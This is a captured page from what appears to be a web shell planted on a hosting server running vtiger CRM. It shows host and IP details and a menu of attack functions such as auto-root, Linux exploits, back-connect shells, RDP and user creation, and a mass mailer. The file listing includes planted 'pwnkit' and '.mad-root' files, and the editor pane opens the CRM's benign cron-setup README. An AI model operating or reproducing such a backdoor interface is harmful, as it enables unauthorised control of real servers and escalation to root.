Linux webd002.cluster121.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.121.40.2 | : 216.73.216.88
Cant Read [ /etc/named.conf ]
7.2.34
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
letacommog /
crmleta /
cron /
[ HOME SHELL ]
Name
Size
Permission
Action
language
[ DIR ]
drwx---r-x
modules
[ DIR ]
drwx---r-x
.mad-root
0
B
-rw----r--
MailScanner.service
2.78
KB
-rw----r--
README-NewCronServiceSetup.txt
1.87
KB
-rw----r--
SendReminder.service
12.69
KB
-rw----r--
class.phpmailer.php
44.84
KB
-rw----r--
class.smtp.php
32.69
KB
-rw----r--
executecron.sh
594
B
-rw----r--
intimateTaskStatus.bat
887
B
-rw----r--
intimateTaskStatus.php
6.98
KB
-rw----r--
jobstartwindows.bat
1.19
KB
-rw----r--
output.txt
283
B
-rw----r--
pwnkit
0
B
-rwx---r-x
schtasks.exe
111
KB
-rw----r--
send_mail.php
1.94
KB
-rw----r--
sendreminder.sh
583
B
-rw----r--
sendsupportnotification.sh
594
B
-rw----r--
vtigercron.bat
748
B
-rw----r--
vtigercron.sh
651
B
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README-NewCronServiceSetup.txt
To setup a new cron service =========================== 1. Create <ServiceName>.service file, which has the following content at the beginning <?php require_once('config.inc.php'); /** Verify the script call is from trusted place. */ global $application_unique_key; if($_REQUEST['app_key'] != $application_unique_key) { echo "Access denied!"; exit; } /** * Check if instance of this service is already running? */ $svcname = $_REQUEST['service']; // We need to make sure the PIDfile name is unqique $servicePIDFile = "logs/$svcname-service.pid"; if(file_exists($servicePIDFile)) { echo "Service $svcname already running! Check $servicePIDFile"; exit; } else { $servicePIDFp = fopen($servicePIDFile, 'a'); } /** * Turn-off PHP error reporting. */ try { error_reporting(0); } catch(Exception $e) { } // ... REST OF YOUR CODE ... // AT END /** Close and remove the PID file. */ if($servicePIDFp) { fclose($servicePIDFp); unlink($servicePIDFile); } ?> ===================================================================================================================================== 2. Create <ServiceName>Cron.sh file which should have the following: export VTIGERCRM_ROOTDIR=`dirname "$0"`/.. export USE_PHP=php cd $VTIGERCRM_ROOTDIR $USE_PHP -f vtigercron.php service="<ServiceName>" <param>="<value>" ===================================================================================================================================== 3. Create <ServiceName>Cron.bat file which should have the following: @echo off set VTIGERCRM_ROOTDIR="C:\Program Files\vtigercrm5\apache\htdocs\vtigerCRM" set PHP_EXE="C:\Program Files\vtigercrm5\php\php.exe" cd /D %VTIGERCRM_ROOTDIR% %PHP_EXE% -f vtigercron.php service="<ServiceName>" <param>="<value>" =====================================================================================================================================
Close